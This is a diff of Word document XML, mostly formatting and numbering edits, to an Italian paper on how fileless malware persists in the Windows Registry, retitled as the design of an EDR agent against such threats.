-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="62338613">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="993728766">
     <w:abstractNumId w:val="3"/>
@@ -4411,55 +5938,64 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="340402470">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="840893291">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1137642995">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="840893291">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="1137642995">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
   <w:num w:numId="8" w16cid:durableId="1901280077">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1505129166">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1966766617">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1079909917">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="1981299414">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="1699313517">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="998113943">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="2034728165">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="16" w16cid:durableId="1215310160">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="480774904">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="18" w16cid:durableId="1595555786">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="19" w16cid:durableId="1238134191">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1038969861">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1410880810">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="22" w16cid:durableId="2060012936">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="23" w16cid:durableId="305207671">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="24" w16cid:durableId="1386561492">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>
@@ -5067,7 +6603,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Carpredefinitoparagrafo">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabellanormale">
@@ -5460,6 +6995,50 @@
       </w:tblBorders>
     </w:tblPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Intestazione">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normale"/>
+    <w:link w:val="IntestazioneCarattere"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DE028B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4819"/>
+        <w:tab w:val="right" w:pos="9638"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="IntestazioneCarattere">
+    <w:name w:val="Intestazione Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Intestazione"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00DE028B"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Pidipagina">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normale"/>
+    <w:link w:val="PidipaginaCarattere"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00DE028B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4819"/>
+        <w:tab w:val="right" w:pos="9638"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="PidipaginaCarattere">
+    <w:name w:val="Piè di pagina Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="Pidipagina"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00DE028B"/>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -64,6 +64,7 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -121,7 +122,22 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Come suggerisce il termine, questa tipologia di minaccia non deposita </w:t>
+        <w:t xml:space="preserve">. Come </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>suggerisce</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il termine, questa tipologia di minaccia non deposita </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -439,7 +455,22 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Una volta che queste istruzioni sono state scritte nel Registro, il malware ha completato la fase di installazione fileless: da quel momento in poi, il "corpo" del virus risiederà solo nel database del Registro e la sua attività sarà visibile solo in memoria RAM.</w:t>
+        <w:t xml:space="preserve">Una volta che queste istruzioni sono state scritte nel Registro, il malware ha completato la fase di installazione fileless: da quel momento in poi, il "corpo" del virus risiederà solo nel database del Registro e la </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>sua</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attività sarà visibile solo in memoria RAM.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -503,57 +534,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>È bene chiarire a grandi linee cosa è il</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Registro di Sistema di Windows</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>: U</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>n database gerarchico che memorizza le impostazioni di configurazione</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nell fattispecie, u</w:t>
+        <w:t>U</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -664,7 +645,15 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> o la memorizzazione di codice</w:t>
+        <w:t xml:space="preserve"> o la memorizzazione di </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>codice</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2573,6 +2562,7 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
       <w:r>

--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -18,43 +18,7 @@
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
         </w:rPr>
-        <w:t>Neutralizza</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t>re</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> persistenza di fileless </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t xml:space="preserve">malwares </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-        <w:t>su sistemi Windows</w:t>
+        <w:t>Progettazione di un agente EDR per la protezione da minacce fileless</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -151,7 +115,22 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sospetti sul disco rigido, ma opera sfruttando la memoria RAM e strumenti legittimi già presenti nel sistema </w:t>
+        <w:t xml:space="preserve"> sospetti sul disco rigido, ma opera sfruttando la memoria RAM e strumenti legittimi già </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>presenti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nel sistema </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -214,14 +193,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">Questa evoluzione nasce dall'esigenza degli attaccanti di eludere le soluzioni di sicurezza convenzionali, quali gli antivirus basati su firma, che focalizzano la loro attività di scansione principalmente sul file system. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tuttavia,</w:t>
+        <w:t>Questa evoluzione nasce dall'esigenza degli attaccanti di eludere le soluzioni di sicurezza convenzionali, quali gli antivirus basati su firma, che focalizzano la loro attività di scansione principalmente sul file system. Tuttavia,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
